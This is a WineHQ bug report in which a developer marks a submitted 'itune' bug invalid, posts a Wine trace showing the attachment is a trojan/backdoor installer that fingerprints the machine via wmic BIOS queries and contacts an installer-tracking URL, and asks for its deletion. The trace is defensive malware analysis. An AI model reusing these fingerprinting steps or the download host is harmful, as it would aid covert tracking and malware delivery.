[Bug 37365] spam/malware

https://bugs.winehq.org/show_bug.cgi?id=37365

Anastasius Focht focht@gmx.net changed:

What |Removed |Added ---------------------------------------------------------------------------- Status|UNCONFIRMED |RESOLVED CC| |focht@gmx.net Resolution|--- |INVALID Summary|itune |spam/malware

--- Comment #1 from Anastasius Focht focht@gmx.net --- Hello folks,

invalid.

Wine's trace capability is also good for analysing malware .. kinda stupid code though.

--- snip --- ... 0035:Call KERNEL32.CreateProcessA(00000000,00409b80 "C:\users\focht\Temp\baccabebbbha.exe /PID=10096 /SUBPID=0 /NETWORKID=1 /DISTID=19132 /CID=0 /PRODUCT_ID=13577 /SERVER_URL=`omn7).`ip`[o're_,]pnn%ok_`e-_ok /CLICKID= /D1=4 /D2=-1 /D3=-1 /D4=-1 /D5=-1 /PRODUCT_PRIVACY= /PRODUCT_EULA= /PRODUCT_NAME=aOnlbm /EXE_URL=`omnp4.+sc^mm^+^johdlg\)Znmfd*cmh'"...,00000000,00000000,00000000,00000000,00000000,00000000,0042bfe8,0033fa74) ret=00405297 ... 0037:Call KERNEL32.__wine_kernel_init() ret=7bc5a089 0035:Ret KERNEL32.CreateProcessA() retval=00000001 ret=00405297 0035:Call KERNEL32.CloseHandle(00000068) ret=004052a4 0035:Ret KERNEL32.CloseHandle() retval=00000001 ret=004052a4 0035:Call KERNEL32.WaitForSingleObject(00000064,00000064) ret=00401e57 ... 0037:Call KERNEL32.CreateProcessW(00000000,004d78e8 L"wmic /output:C:\users\focht\Temp\91412521814.aaa bios get serialnumber",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146 ... 0039:Call KERNEL32.__wine_kernel_init() ret=7bc5a089 0037:Ret KERNEL32.CreateProcessW() retval=00000001 ret=00477146 ... 0039:Starting process L"C:\windows\system32\wmic.exe" (entryproc=0x7edfc33c) ... Error: Command line not supported ... 0039:Call KERNEL32.ExitProcess(ffffffff) ret=7edfc3ca ... 0037:Call KERNEL32.CreateProcessW(00000000,004d8a38 L"wmic /output:C:\users\focht\Temp\91412521814.aaa bios get version",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146 ... 003b:Call KERNEL32.__wine_kernel_init() ret=7bc5a089 0037:Ret KERNEL32.CreateProcessW() retval=00000001 ret=00477146 ... 0037:Call winhttp.WinHttpCrackUrl(004d9648 L"http://direct.the-apps-track.com/Installer/Flow?pubid=10096&distid=19132...) ret=00477b6c ... --- snip ---

Admin please delete the attachment, it's malware (trojan/backdoor).

... or do you want me to make this malware to work perfectly with Wine? :)

Regards